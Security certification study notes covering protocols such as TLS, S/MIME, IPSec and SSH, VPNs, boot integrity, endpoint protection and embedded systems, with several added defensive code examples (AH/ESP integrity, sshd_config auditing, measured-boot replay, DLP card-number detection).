○ One of the main features of TLS 1.3 is the removal of the ability to perform
downgrade attacks by preventing the use of unsecure features and
algorithms from previous versions.
● Cipher Suites:
○ A cipher suite is the group of algorithms supported by both the client and
server to perform the different encryption and hashing operations required
by the protocol.

API Considerations
● HTTP is now used less to serve static web pages, and more to create web
applications, often as part of a cloud product.
● The primary means of configuring and managing a web application is via its
application programming interface (API).
● The developer uses the POST method to submit data to the URL with the
required parameters coded into the request body, often in JavaScript Object
Notation (JSON).
● Use of these APIs is authorized via a token or secret key.

Subscription Services
● Employees may require access to all kinds of subscription services. Some
examples include:
○ Market and financial intelligence and information.
○ Security threat intelligence and information.
○ Reference and training materials in various formats (ebook and video, for
instance).
○ Software applications and cloud services paid for by subscription rather
than permanent licenses.
● XML Injection:
○ Attack method where malicious XML is passed as input to exploit a
vulnerability in the target app.

File Transfer Services


● File Transfer Protocol (FTP): a protocol used to transfer files between network
hosts. Variants include S(ecure)FTP, FTP with SSL (FTPS and FTPES), and
T(rivial)FTP. FTP utilizes ports 20 and 21.
● SSH FTP (SFTP) and FTP Over SSL (FTPS):
○ SSH FTP (SFTP) addresses the privacy and integrity issues of FTP by
encrypting the authentication and data transfer between client and server.
○ Another means of securing FTP is to use the connection security protocol
SSL/TLS. There are two means of doing this:
■ Explicit TLS (FTPES)—use the AUTH TLS command to upgrade an
unsecure connection established over port 21 to a secure one.
■ Implicit TLS (FTPS)—negotiate an SSL/TLS tunnel before the
exchange of any FTP commands. This mode uses the secure port
990 for the control connection.

Email Services

● The Simple Mail Transfer Protocol (SMTP) transmits email messages from one
system to another.
● The Post Office Protocol v3 (POP3) receives email messages from an email
server to store on a client computer.
● Secure SMTP (SMTPS):
○ A sender’s SMTP server discovers the IP address of the recipient’s SMTP
server using the domain name of the recipient’s email address.
● There are two ways for SMTP to use TLS:
○ STARTTLS—this is a command that upgrades an existing unsecure
connection to use TLS. This is also referred to as explicit TLS or
opportunistic TLS.
○ SMTPS—this establishes the secure connection before any SMTP
commands (HELO, for instance) are exchanged. This is also referred to as
implicit TLS.
● Secure POP (POP3S):
○ When a recipient’s email client connects to a server mailbox, POP3
downloads the email messages.
○ A POP3 client application, such as Microsoft Outlook or Mozilla
Thunderbird, establishes a TCP connection to the POP3 server over port
110.
● Secure IMAP (IMAPS):
○ Compared to POP3, the Internet Message Access Protocol v4 (IMAP4)
supports permanent connections to a server and connecting multiple
clients to the same mailbox simultaneously.
○ It also allows a client to manage mail folders on the server. Clients
connect to IMAP over TCP port 143.

Secure/Multipurpose Internet Mail Extensions


● Secure/Multipurpose Internet Mail Extensions: An email encryption standard that
adds digital signatures and public key cryptography to traditional MIME
communications.
● To use S/MIME, the user is issued a digital certificate containing his or her public
key, signed by a CA to establish its validity.
● The public key is paired with a private key that is kept secret by the user.
● To establish the exchange of secure emails, both users must be using S/MIME
and exchange certificates:
○ Alice sends Bob her digital certificate, containing her public key and
validated digital ID (an email address). She signs this message using her
private key.
○ Bob uses the public key in the certificate to decode her signature and the
signature of the CA (or chain of CAs) validating her digital certificate and
digital ID and decides that he can trust Alice and her email address.
○ He responds with his digital certificate and public key and Alice, following
the same process, decides to trust Bob.
○ Both Alice and Bob now have one another's certificates in their trusted
certificate stores.
○ When Alice wants to send Bob a confidential message, she makes a hash
of the message and signs the hash using her private key. She then
encrypts the message, hash, and her public key using Bob's public key
and sends a message to Bob with this data as an S/MIME attachment.
○ Bob receives the message and decrypts the attachment using his private
key. He validates the signature and the integrity of the message by
decrypting it with Alice's public key and comparing her hash value with
one he makes himself.

Voice and Video Services


● Voice over IP (VoIP), web conferencing, and video teleconferencing (VTC)
solutions have become standard methods for the provision of business
communications.
● Implementing Internet telephony and video conferencing brings its own raft of
security concerns.
● The protocols designed to support real-time services cover one or more of the
following functions:
○ Session control—used to set up and manage communications sessions.
They handle tasks such as user discovery (locating a user on the
network), availability advertising (whether a user is prepared to receive
calls), negotiating session parameters (such as use of audio/video), and
session management and termination.
○ Data transport—handles the delivery of the actual video or voice
information.
○ Quality of Service (QoS)—provides information about the connection to a
QoS system, which in turn ensures that voice or video communications
are free from problems such as dropped packets, delay, or jitter.
● The Session Initiation Protocol (SIP) is one of the most widely used session
control protocols.
○ SIP endpoints are the end-user devices (also known as user-agents),
such as IP-enabled handsets or client and server web conference
software.
○ SIP endpoints can establish communications directly in a peer-to-peer
architecture, but it is more typical to use intermediary servers and
directory servers.
○ While SIP provides session management features, the actual delivery of
real-time data uses different protocols.
■ The principal one is Real-time Transport Protocol (RTP).
● Connection security for voice and video works in a similar manner to HTTPS. To
initiate the call, the secure version SIPS uses digital certificates to authenticate
the endpoints and establish a TLS tunnel.
○ The secure connection established by SIPS can also be used to generate
a master key to use with the secure versions of the transport protocol
(SRTP).

Remote Access Architecture


● These days, most remote access is implemented as a virtual private network
(VPN), running over the Internet.
● With a remote access VPN, clients connect to a VPN gateway on the edge of the
private network.
○ This is the "telecommuter" model, allowing home-workers and employees
working in the field to connect to the corporate network.


● A VPN can also be deployed in a site-to-site model to connect two or more
private networks.
○ Where remote access VPN connections are typically initiated by the client,
a site-to-site VPN is configured to operate automatically.
○ The gateways exchange security information using whichever protocol the
VPN is based on.
○ This establishes a trust relationship between the gateways and sets up a
secure connection through which to tunnel data.

Transport Layer Security VPN


● Legacy protocols such as the Point-to-Point Tunneling Protocol (PPTP) have
been deprecated because they do not offer adequate security.
● A TLS VPN (still more commonly referred to as an SSL VPN) requires a remote
access server listening on port 443 (or any arbitrary port number).
○ The client makes a connection to the server using TLS so that the server
is authenticated to the client (and optionally the client's certificate must be
authenticated by the server).
○ This creates an encrypted tunnel for the user to submit authentication
credentials, which would normally be processed by a RADIUS server.
● OpenVPN is an open source example of a TLS VPN (openvpn.net).
○ OpenVPN can work in TAP (bridged) mode to tunnel layer 2 frames or in
TUN (routed) mode to forward IP packets.
● Another option is Microsoft's Secure Socket Tunneling Protocol (SSTP), which
works by tunneling Point-to-Point Protocol (PPP) layer 2 frames over a TLS
session.
● The Point-to-Point Protocol (PPP) is a widely used remote dial-in protocol.
Internet Protocol Security
● Internet Protocol Security (IPSec) operates at the network layer (layer 3) of the
OSI model, so it can be implemented without having to configure specific
application support.
● IPSec can provide both confidentiality (by encrypting data packets) and
integrity/anti-replay (by signing each packet).
● The main drawback is that it adds overhead to data communications.
● Authentication Header (AH):
○ The Authentication Header (AH) protocol performs a cryptographic hash
on the whole packet, including the IP header, plus a shared secret key
(known only to the communicating hosts), and adds this HMAC in its
header as an Integrity Check Value (ICV).
○ The payload is not encrypted so this protocol does not provide
confidentiality.
○ Also, the inclusion of IP header fields in the ICV means that the check will
fail across NAT gateways, where the IP address is rewritten.
○ Consequently, AH is not often used.
● Encapsulation Security Payload (ESP):
○ Encapsulation Security Payload (ESP) provides confidentiality and/or
authentication and integrity.
○ It can be used to encrypt the packet rather than simply calculating an
HMAC.
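The AH and ESP integrity checks described above, reduced to a toy packet model to show why an AH check fails across a NAT gateway while an ESP check does not. This is an added Python example, not part of the original notes; the packet fields, key, addresses, and 16-byte truncation are assumptions, and only the integrity check is modelled (no encryption).

```python
import hashlib
import hmac
import ipaddress
import struct
from dataclasses import dataclass, replace

ICV_LEN = 16  # bytes kept from the HMAC-SHA256 output (assumed truncation)


@dataclass(frozen=True)
class Packet:
    """Toy IPv4 packet holding only the fields this demonstration needs."""
    src: str
    dst: str
    ttl: int
    payload: bytes
    icv: bytes = b""


def immutable_header(pkt):
    # TTL changes at every hop, so it is packed as zero for the ICV,
    # the way AH zeroes mutable header fields. Addresses are included.
    return struct.pack(
        "!4s4sB",
        ipaddress.IPv4Address(pkt.src).packed,
        ipaddress.IPv4Address(pkt.dst).packed,
        0,
    )


def ah_icv(key, pkt):
    """AH-style ICV: HMAC over the IP header fields plus the payload."""
    data = immutable_header(pkt) + pkt.payload
    return hmac.new(key, data, hashlib.sha256).digest()[:ICV_LEN]


def esp_icv(key, pkt):
    """ESP-style ICV: HMAC over the payload only, not the outer IP header."""
    return hmac.new(key, pkt.payload, hashlib.sha256).digest()[:ICV_LEN]


def protect(key, pkt, icv_fn):
    """Sender side: attach the ICV."""
    return replace(pkt, icv=icv_fn(key, pkt))


def verify(key, pkt, icv_fn):
    """Receiver side: recompute the ICV and compare in constant time."""
    return hmac.compare_digest(pkt.icv, icv_fn(key, pkt))


def route_hop(pkt):
    """An ordinary router decrements the TTL."""
    return replace(pkt, ttl=pkt.ttl - 1)


def nat_rewrite(pkt, public_src):
    """A NAT gateway replaces the private source address."""
    return replace(pkt, src=public_src)


def demo():
    key = b"constructed-shared-secret"  # sample value, not a real key
    original = Packet("10.1.0.25", "198.51.100.10", 64, b"application data")
    results = {}
    for name, icv_fn in (("AH", ah_icv), ("ESP", esp_icv)):
        sent = protect(key, original, icv_fn)
        routed = route_hop(sent)
        results[name] = {
            "routed": verify(key, routed, icv_fn),
            "natted": verify(key, nat_rewrite(routed, "203.0.113.5"), icv_fn),
            "tampered": verify(key, replace(sent, payload=b"application dat4"), icv_fn),
        }
    return results


if __name__ == "__main__":
    for proto, outcome in demo().items():
        print(proto, outcome)
```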

IPSec Transport and Tunnel Modes


● IPSec can be used in two modes:
○ Transport mode—this mode is used to secure communications between
hosts on a private network (an end-to-end implementation).
■ When ESP is applied in transport mode, the IP header for each
packet is not encrypted, just the payload data.
○ Tunnel mode—this mode is used for communications between VPN
gateways across an unsecure network (creating a VPN).
■ With ESP, the whole IP packet (header and payload) is encrypted
and encapsulated as a datagram with a new IP header.

Internet Key Exchange


● IPSec's encryption and hashing functions depend on a shared secret.
● The Internet Key Exchange (IKE) protocol handles authentication and key
exchange, referred to as Security Associations (SA).
● IKE negotiations take place over two phases:
○ Phase I establishes the identity of the two hosts and performs key
agreement using the Diffie-Hellman algorithm to create a secure channel.
Two methods of authenticating hosts are commonly used:
■ Digital certificates—the hosts use certificates issued by a mutually
trusted certificate authority to identify one another.
■ Pre-shared key (group authentication)—the same passphrase is
configured on both hosts.
○ Phase II uses the secure channel created in Phase I to establish which
ciphers and key sizes will be used with AH and/or ESP in the IPSec
session.

Layer 2 Tunneling Protocol and IKE v2


● For remote access VPNs, a combination of IPSec with the Layer 2
Tunneling Protocol (L2TP) VPN protocol is often used.
● For a secure L2TP/IPSec VPN configuration, specific ports need to be allowed
through the firewall.
○ The L2TP protocol typically uses UDP port 1701.
○ For IPSec, UDP port 500 is essential for IKE negotiations, and UDP port
4500 is used for NAT traversal.
● Layer 2 Tunneling Protocol/IPSec VPN:
○ An L2TP/IPSec VPN would typically operate as follows:
■ The client and VPN gateway set up a secure IPSec channel over
the Internet, using either a pre-shared key or certificates for IKE.
■ The VPN gateway uses L2TP to set up a tunnel to exchange local
network data encapsulated as Point-to-Point Protocol (PPP)
frames.
■ The user authenticates over the PPP session using EAP or CHAP.
● IKE v2:
○ IKEv2 has some additional features that have made the protocol popular
for use as a standalone remote access VPN solution.
○ The main changes are:
■ Support for EAP authentication methods, allowing, for example,
user authentication against a RADIUS server.
■ Simplified connection setup—IKEv2 specifies a single 4-message
setup mode, reducing bandwidth without compromising security.
■ Reliability — IKEv2 supports NAT traversal and the feature of
multihoming through MOBIKE (IKEv2 Mobility and Multihoming
Protocol).
■ Compared to L2TP/IPSec, using IKE v2 is more efficient. This
solution is becoming much better supported, with native support in
Windows 10, for instance.

VPN Client Configuration


● Always-On VPN:
○ An always-on VPN means that the computer establishes the VPN
whenever an Internet connection over a trusted network is detected, using
the user's cached credentials to authenticate.
● Split Tunnel versus Full Tunnel:
○ Split Tunnel: VPN configuration where only traffic for the private network is
routed via the VPN gateway.
○ Full Tunnel: Internet access is mediated by the corporate network, which
will alter the client's IP address and DNS servers and may use a proxy.

Remote Desktop
● Microsoft's Remote Desktop Protocol (RDP) can be used to access a physical
machine on a one-to-one basis.
● HTML5 VPN: Using features of HTML5 to implement remote desktop/VPN
connections via browser software (clientless).

Out-Of-Band Management and Jump Servers


● Remote access management refers to the specific use case of using a secure
channel to administer a network appliance or server.
● The secure admin workstations (SAWs) used to perform management functions
must be tightly locked down, ideally installed with no software other than that
required to access the administrative channel—minimal web browser, remote
desktop client, or SSH virtual terminal, for instance.
● Out-of-Band Management:
○ Remote management methods can be described as either in-band or out-
of-band (OOB).
○ An in-band management link is one that shares traffic with other
communications on the "production" network.
○ A serial console or modem port on a router is a physically out-of-band
management method.
■ When using a browser-based management interface or a virtual
terminal over Ethernet and IP, the link can be made out-of-band by
connecting the port used for management access to physically
separate network infrastructure.
● Jump Servers:
○ A hardened server that provides access to other hosts.
○ One of the challenges of managing hosts that are exposed to the Internet,
such as servers and appliances in a DMZ, is to provide administrative
access to them.
○ Administrators connect to the jump server then use the jump server to
connect to the admin interface on the application server.
Secure Shell
● Secure Shell (SSH) is the principal means of obtaining secure remote access to
a command line terminal.
● The main uses of SSH are for remote administration and secure file transfer
(SFTP).
● SSH Client Authentication:
○ Each of these methods can be enabled or disabled as required on the
server, using the /etc/ssh/sshd_config file:
■ Username/password—the client submits credentials that are
verified by the SSH server either against a local user database or
using a RADIUS/TACACS+ server.
■ Public key authentication—each remote user's public key is added
to a list of keys authorized for each local account on the SSH
server.
■ Kerberos—the client submits a Ticket Granting Ticket (TGT) to the
Ticket Granting Service (TGS) along with the Service Principal
Name (SPN) of the SSH server that the client wants to access.
● SSH Commands:
○ SSH commands are used to connect to hosts and set up authentication
methods.
○ To connect to an SSH server at 10.1.0.10 using an account named
"bobby" and password authentication, run:
■ ssh bobby@10.1.0.10
○ The following commands create a new key pair and copy the public key to an
account on the remote server:
■ ssh-keygen -t rsa
■ ssh-copy-id bobby@10.1.0.10
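One way to check which of the client authentication methods above a given sshd_config enables, as an added Python example that is not part of the original notes. The sample configuration is constructed and the function names are hypothetical; the parser reads one file only and does not follow Include directives.

```python
import re

# sshd_config keywords for the methods listed above, with sshd's defaults.
# Kerberos has two: KerberosAuthentication validates a password against the
# KDC, GSSAPIAuthentication is the ticket-based exchange.
AUTH_DEFAULTS = {
    "PasswordAuthentication": "yes",
    "PubkeyAuthentication": "yes",
    "KerberosAuthentication": "no",
    "GSSAPIAuthentication": "no",
}
_CANONICAL = {name.lower(): name for name in AUTH_DEFAULTS}

# Keyword and argument are separated by whitespace or by a single "=".
LINE = re.compile(r"([A-Za-z0-9]+)(?:\s*=\s*|\s+)(.*)$")

# Constructed sample configuration (not taken from a real host).
SAMPLE_CONFIG = """\
# global section
Port 22
PubkeyAuthentication yes
# keywords are case-insensitive
passwordauthentication no
# ignored: for each keyword the first value obtained is used
PasswordAuthentication yes
GSSAPIAuthentication=yes

Match Address 10.1.0.0/24
    PasswordAuthentication yes
"""


def parse(text):
    """Split a config into global settings and per-Match overrides."""
    global_settings, overrides = {}, []
    current_match = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE.match(line)
        if not m:
            continue
        keyword, value = m.group(1).lower(), m.group(2)
        if keyword == "match":
            current_match = value
        elif current_match is None:
            global_settings.setdefault(keyword, value)  # first value wins
        else:
            overrides.append((current_match, keyword, value))
    return global_settings, overrides


def enabled_methods(text):
    """Return {keyword: enabled?} for the global section, applying defaults."""
    settings, _ = parse(text)
    return {
        name: settings.get(name.lower(), default) == "yes"
        for name, default in AUTH_DEFAULTS.items()
    }


def match_overrides(text):
    """Authentication keywords that a Match block sets for some connections."""
    _, overrides = parse(text)
    return [
        (criteria, _CANONICAL[keyword], value)
        for criteria, keyword, value in overrides
        if keyword in _CANONICAL
    ]


if __name__ == "__main__":
    print(enabled_methods(SAMPLE_CONFIG))
    print(match_overrides(SAMPLE_CONFIG))
```

The Match override is the case worth checking for: password authentication is off globally in the sample but switched back on for one address range. On a live host, sshd -T prints the effective configuration.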

Lesson 12: Implementing Host Security Solutions

Hardware Root of Trust


● A cryptographic module embedded within a computer system that can endorse
trusted execution and attest to boot settings and metrics.
○ For example, when a computer joins a network, it might submit a report to
the network access control (NAC) server declaring, "My operating system
files have not been replaced with malicious versions."
● The hardware root of trust is used to scan the boot metrics and OS files to verify
their signatures, then it signs the report.
● The NAC server can trust the signature and therefore the report contents if it can
trust that the signing entity's private key is secure.
● The RoT is usually established by a type of cryptoprocessor called a trusted
platform module (TPM).
○ TPM is a specification for hardware-based storage of encryption keys,
hashed passwords, and other user and platform identification information.
○ The TPM is implemented either as part of the chipset or as an embedded
function of the CPU.
○ Each TPM is hard-coded with a unique, unchangeable asymmetric private
key called the endorsement key.
■ This endorsement key is used to create various other types of
subkeys used in key storage, signature, and encryption operations.

Boot Integrity
● Most PCs implement the unified extensible firmware interface (UEFI).
○ UEFI provides code that allows the host to boot to an OS. UEFI can
enforce a number of boot integrity checks.
● Secure Boot:
○ Secure boot is designed to prevent a computer from being hijacked by a
malicious OS.
○ UEFI is configured with digital certificates from valid OS vendors.
○ The system firmware checks the operating system boot loader and kernel
using the stored certificate to ensure that it has been digitally signed by
the OS vendor.
● Measured Boot:
○ A trusted or measured boot process uses platform configuration registers
(PCRs) in the TPM at each stage in the boot process to check whether
hashes of key system state data (boot firmware, boot loader, OS kernel,
and critical drivers) have changed.
● Boot Attestation:
○ Report of boot state integrity data that is signed by a tamper-proof TPM
key and reported to a network server.
○ The boot log can be analyzed for signs of compromise, such as the
presence of unsigned drivers.
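The measured boot and attestation steps above, modelled as a single PCR that each boot stage extends, with a verifier that replays the boot log. This is an added Python example, not part of the original notes; the stage images are constructed byte strings, the function names are hypothetical, and the TPM's signature over the report is left out.

```python
import hashlib

PCR_SIZE = 32  # one SHA-256 register, all zeroes at power-on

# Constructed stand-ins for the images measured at each boot stage.
GOOD_BOOT = [
    ("boot firmware", b"firmware image v1"),
    ("boot loader", b"boot loader image v1"),
    ("OS kernel", b"kernel image v1"),
    ("critical drivers", b"driver bundle v1"),
]
# Known-good digests the verifier holds for each stage.
REFERENCE = {name: hashlib.sha256(image).digest() for name, image in GOOD_BOOT}
# Same boot chain with one stage replaced.
TAMPERED_BOOT = [
    (name, b"modified boot loader image" if name == "boot loader" else image)
    for name, image in GOOD_BOOT
]


def extend(pcr, measurement):
    """Extend operation: new PCR = H(old PCR || measurement digest).
    A PCR can only be extended, never set, so it commits to the whole sequence."""
    return hashlib.sha256(pcr + measurement).digest()


def measured_boot(stages):
    """Hash each stage in order, extend the PCR, and record a boot log."""
    pcr = bytes(PCR_SIZE)
    log = []
    for name, image in stages:
        digest = hashlib.sha256(image).digest()
        pcr = extend(pcr, digest)
        log.append((name, digest))
    return pcr, log


def replay(log):
    """Recompute the PCR value that a boot log claims to lead to."""
    pcr = bytes(PCR_SIZE)
    for _, digest in log:
        pcr = extend(pcr, digest)
    return pcr


def appraise(reported_pcr, log, reference):
    """Verifier side. An empty list means the boot state matches the reference."""
    findings = []
    # 1. The log must reproduce the PCR, otherwise the log itself was altered.
    if replay(log) != reported_pcr:
        findings.append("event log does not reproduce the reported PCR")
    # 2. The stages must be the expected ones, in the expected order.
    if [name for name, _ in log] != list(reference):
        findings.append("boot stages differ from the reference sequence")
    # 3. Each measurement must equal its known-good digest.
    for name, digest in log:
        if name in reference and reference[name] != digest:
            findings.append(f"{name}: measurement changed")
    return findings


if __name__ == "__main__":
    for label, stages in (("good", GOOD_BOOT), ("tampered", TAMPERED_BOOT)):
        pcr, log = measured_boot(stages)
        print(label, pcr.hex()[:16], appraise(pcr, log, REFERENCE))
```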

Disk Encryption
● Full disk encryption (FDE) means that the entire contents of the drive (or
volume), including system files and folders, are encrypted.
● Drive encryption allays this security concern by making the contents of the drive
accessible only in combination with the correct encryption key.
● FDE requires the secure storage of the key used to encrypt the drive contents.
○ Normally, this is stored in a TPM.
○ The TPM chip has a secure storage area that a disk encryption program,
such as Windows BitLocker, can write its keys to.
● One of the drawbacks of FDE is that, because the OS performs the cryptographic
operations, performance is reduced.
○ This issue is mitigated by self-encrypting drives (SED), where the
cryptographic operations are performed by the drive controller.
■ The SED uses a symmetric data/media encryption key (DEK/MEK)
for bulk encryption and stores the DEK securely by encrypting it
with an asymmetric key pair called either the authentication key
(AK) or key encryption key (KEK).
■ Use of the AK is authenticated by the user password.
USB and Flash Drive Security
● A modified device may have visual clues that distinguish it from a mass
manufactured thumb drive or cable, but these may be difficult to spot.
● Another example is the O.MG cable which packs enough processing capability
into an ordinary-looking USB-Lightning cable to run an access point and
keylogger.

Third-Party Risk Management


● Hardware and firmware vulnerabilities and exploits demonstrate the necessity of
third-party risk management.
● Anyone with the time and resources to modify the computer's firmware could (in
theory) create some sort of backdoor access.
● When assessing suppliers for risk, it is helpful to distinguish two types of
relationship:
○ Vendor—this means a supplier of commodity goods and services, possibly
with some level of customization and direct support.
○ Business partner—this implies a closer relationship where two companies
share quite closely aligned goals and marketing opportunities.

End of Life Systems


● When a manufacturer discontinues sales of a product, it enters an end of life
(EOL) phase in which support and availability of spares and updates become
more limited.
● An end of service life (EOSL) system is one that is no longer supported by its
developer or vendor.

Organizational Security Agreements


● It is important to remember that although one can outsource virtually any service
or activity to a third party, one cannot outsource legal accountability for these
services or actions.
● Issues of security risk awareness, shared duties, and contractual responsibilities
can be set out in a formal legal agreement.
● The following types of agreements are common:
○ Memorandum of understanding (MOU)—A preliminary or exploratory
agreement to express an intent to work together.
○ Business partnership agreement (BPA)—While there are many ways of
establishing business partnerships, the most common model in IT is the
partner agreements that large IT companies (such as Microsoft and Cisco)
set up with resellers and solution providers.
○ Nondisclosure agreement (NDA)—Legal basis for protecting information
assets.
■ If the employee or contractor breaks this agreement and does
share such information, they may face legal consequences.
○ Service level agreement (SLA)—A contractual agreement setting out the
detailed terms under which a service is provided.
○ Measurement systems analysis (MSA)—quality management
processes, such as Six Sigma, make use of quantified analysis methods
to determine the effectiveness of a system.
■ A measurement systems analysis (MSA) is a means of evaluating
the data collection and statistical methods used by a quality
management process to ensure they are robust.

Hardening
● The process of putting an operating system or application in a secure
configuration is called hardening.
● The essential principle is least functionality: a system should run only the
protocols and services required by legitimate users and no more.
● Services provide a library of functions for different types of applications. Some
services support local features of the OS and installed applications.
● Application service ports allow client software to connect to applications over a
network.
○ These should either be disabled or blocked at a firewall if remote access is
not required.
● Persistent storage holds user data generated by applications, plus cached
credentials.
○ Disk encryption is essential to data security.

Baseline Configuration and Registry Settings


● You will have separate configuration baselines for desktop clients, file and print
servers, Domain Name System (DNS) servers, application servers, directory
services servers, and other types of systems.
● In Windows, configuration settings are stored in the registry.
● These policy settings are applied to the registry each time a computer boots.
● Baseline deviation reporting means testing the actual configuration of hosts to
ensure that their configuration settings match the baseline template.
○ On Windows networks, the Microsoft Baseline Security Analyzer (MBSA)
tool was popularly used to validate the security configuration.

Patch Management
● Automated vulnerability scanners can be effective at discovering missing
patches for the operating system, plus a wide range of third-party software apps
and devices/firmware.
● On residential and small networks, hosts will be configured to auto-update,
meaning that they check for and install patches automatically.
● These issues can be mitigated by deploying an enterprise patch management
suite.
○ Identifying, testing, and deploying OS and application updates.

Endpoint Protection
● Antivirus (A-V)/Anti-Malware:
○ An "A-V" product will now perform generalized malware detection,
meaning not just viruses and worms, but also Trojans, spyware, PUPs,
cryptojackers, and so on.
● Host-Based Intrusion Detection/Prevention (HIDS/HIPS):
○ Host-based intrusion detection systems (HIDS) provide threat detection
via log and file system monitoring.
○ File system integrity monitoring uses signatures to detect whether a
managed file image—such as an OS system file, driver, or application
executable—has changed.
● Endpoint Protection Platform (EPP):
○ An endpoint protection platform (EPP) is a single agent performing
multiple security tasks, including malware/intrusion detection and
prevention, but also other security features, such as a host firewall, web
content filtering/secure search and browsing, and file/message encryption.
● Data Loss Prevention (DLP):
○ Many EPPs include a data loss prevention (DLP) agent.
○ This is configured with policies to identify privileged files and strings that
should be kept private or confidential, such as credit card numbers.
○ The agent enforces the policy to prevent data from being copied or
attached to a message without authorization.
● Endpoint Protection Deployment:
○ While specific products vary widely in terms of features and
implementation detail, some generic tasks to implement endpoint
protection include:
■ 1. Configure the management system to push the agent software
and any updates to all desktops. This will require configuring
permissions and firewall settings.
■ 2. Assign hosts to appropriate groups for policy assignment. For
example, client endpoints have very different security requirements
to servers.
■ 3. Test the different host group configuration settings to ensure that
the expected range of threats is detected.
■ 4. Use a monitoring dashboard to verify status across all network
hosts. Apart from detection events, if the agent is disabled or
missing, there should be an alert.
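
As an added illustration of the DLP policy check described above (not part of the original notes and not any product's code), this C example flags card-number candidates in outbound text: runs of 13 to 19 digits, optionally grouped with spaces or hyphens, that pass the Luhn checksum. The function names, the length window, and the sample strings are assumptions constructed for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Luhn checksum over n ASCII digits; returns 1 when the check digit matches. */
static int luhn_valid(const char *digits, size_t n)
{
    int sum = 0;
    int dbl = 0; /* double every second digit, counting from the right */
    for (size_t i = n; i-- > 0;) {
        int d = digits[i] - '0';
        if (dbl) {
            d *= 2;
            if (d > 9)
                d -= 9;
        }
        sum += d;
        dbl = !dbl;
    }
    return n > 0 && sum % 10 == 0;
}

/*
 * Count card-number candidates in text. A candidate is a run of 13-19 digits
 * in which single spaces or hyphens may separate digit groups. The Luhn test
 * filters out most order IDs, phone numbers and other long digit strings.
 */
int dlp_count_card_numbers(const char *text)
{
    int hits = 0;
    size_t len = strlen(text);
    size_t i = 0;

    while (i < len) {
        if (!isdigit((unsigned char)text[i])) {
            i++;
            continue;
        }
        char digits[32];
        size_t nd = 0; /* digits seen in this run (may exceed the buffer) */
        size_t j = i;
        while (j < len) {
            unsigned char c = (unsigned char)text[j];
            if (isdigit(c)) {
                if (nd < sizeof digits)
                    digits[nd] = (char)c;
                nd++;
                j++;
            } else if ((c == ' ' || c == '-') && j + 1 < len &&
                       isdigit((unsigned char)text[j + 1])) {
                j++; /* separator inside a grouped number */
            } else {
                break;
            }
        }
        if (nd >= 13 && nd <= 19 && luhn_valid(digits, nd))
            hits++;
        i = j;
    }
    return hits;
}

/* Policy decision: 1 = allow the copy/attachment, 0 = block it. */
int dlp_allow_transfer(const char *text, int authorized)
{
    return authorized || dlp_count_card_numbers(text) == 0;
}

int main(void)
{
    /* Constructed sample messages; the card numbers are public test values. */
    const char *samples[] = {
        "Meeting moved to 14:30",
        "Order 1234567812345678 shipped",
        "pay with 4111 1111 1111 1111",
    };
    for (size_t k = 0; k < sizeof samples / sizeof samples[0]; k++)
        printf("%-34s -> %s\n", samples[k],
               dlp_allow_transfer(samples[k], 0) ? "allow" : "block");
    return 0;
}
```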

Next-Generation Endpoint Protection


● Endpoint Detection and Response (EDR):
○ A software agent that collects system data and logs for analysis by a
monitoring system to provide early detection of threats.
○ The aim is not to prevent initial execution, but to provide real-time and
historical visibility into the compromise, contain the malware within a
single host, and facilitate remediation of the host to its original state.
● Next-Generation Firewall Integration:
○ An analytics-driven next-gen antivirus product is likely to combine with the
perimeter and zonal security offered by next-gen firewalls.
○ For example, detecting a threat on an endpoint could automate a firewall
policy to block the covert channel at the perimeter, isolate the endpoint,
and mitigate risks of the malware using lateral movement between hosts.

Antivirus Response
● An on-access antivirus scanner or intrusion prevention system works by
identifying when processes or scripts are executed and intercepting (or hooking)
the call to scan the code first.
● If the code matches a signature of known malware or exhibits malware-like
behavior that matches a heuristic profile, the scanner will prevent execution and
attempt to take the configured action on the host file (clean, quarantine, erase,
and so on).
● An alert will be displayed to the user and the action will be logged (and also may
generate an administrative alert).
● Advanced Malware Tools:
○ When you identify symptoms such as these, but the AV scanner or EPP
agent does not report an infection, you will need to analyze the host for
malware using advanced tools.
● Sandboxing:
○ Sandboxing is a technique that isolates an untrusted host or app in a
segregated environment to conduct tests.

Embedded Systems
● An embedded system is a complete computer system that is designed to
perform a specific, dedicated function.
● Embedded systems can be characterized as static environments.
○ A static environment does not allow or require such frequent changes.
● A PC is a dynamic environment.
○ The user can add or remove programs and data files, install new hardware
components, and upgrade the operating system.
● Cost, Power, and Compute Constraints:
○ Embedded systems are usually constrained in terms of processor
capability (cores and speed), system memory, and persistent storage.
○ The other factor determining compute resources is power.
■ Many embedded devices are battery-powered, and may need to
run for years without having to replace the cells.
■ This means that processing must be kept to the minimum possible
level.
● Crypto, Authentication, and Implied Trust Constraints:
○ The lack of computer resources means that embedded systems are not
well-matched to the cryptographic identification and authentication
technologies that are widely used on computer networks.
○ As embedded systems become more accessible via those networks,
however, they need to use cryptoprocessors to ensure confidentiality,
integrity, and availability.
● Network and Range Constraints:
○ Networks for embedded systems emphasize power-efficient transfer of
small amounts of data with a high degree of reliability and low latency.

Logic Controllers for Embedded Systems


● Embedded systems are normally based on firmware running on a
programmable logic controller (PLC).
○ A type of computer designed for deployment in an industrial or outdoor
setting that can automate and monitor mechanical systems.
● System on Chip (SoC):
○ System on chip (SoC) is a design where all these processors,
controllers, and devices are provided on a single processor die (or chip).
○ Raspberry Pi (raspberrypi.org) and Arduino (arduino.cc) are examples of
SoC boards, initially devised as educational tools, but now widely used for
industrial applications, and hacking.
● Field Programmable Gate Array (FPGA):
○ A microcontroller is a processing unit that can perform sequential
operations from a dedicated instruction set.
○ FPGA: A processor that can be programmed to perform a specific function
by a customer rather than at the time of manufacture.
● Real-Time Operating Systems (RTOS):
○ Many embedded systems operate devices that perform acutely time-
sensitive tasks, such as drip meters or flow valves.
○ RTOS: A type of OS that prioritizes deterministic execution of operations
to ensure consistent response for time-critical tasks.

Embedded Systems Communications Considerations


● Operational Technology (OT) Networks:
○ A cabled network for industrial applications is referred to as an operational
technology (OT) network.
○ These typically use either serial data protocols or industrial Ethernet.
● Cellular Networks:
○ This is also called baseband radio, after the baseband processor that
performs the function of a cellular modem.
○ There are several baseband radio technologies:
■ Narrowband-IoT (NB-IoT)—this refers to a low-power version of the
Long Term Evolution (LTE) or 4G cellular standard.
● The signal occupies less bandwidth than regular cellular.
● Narrowband also has greater penetrating power, making it
more suitable for use in inaccessible locations, such as
tunnels or deep within buildings, where ordinary cellular
connectivity would be impossible.
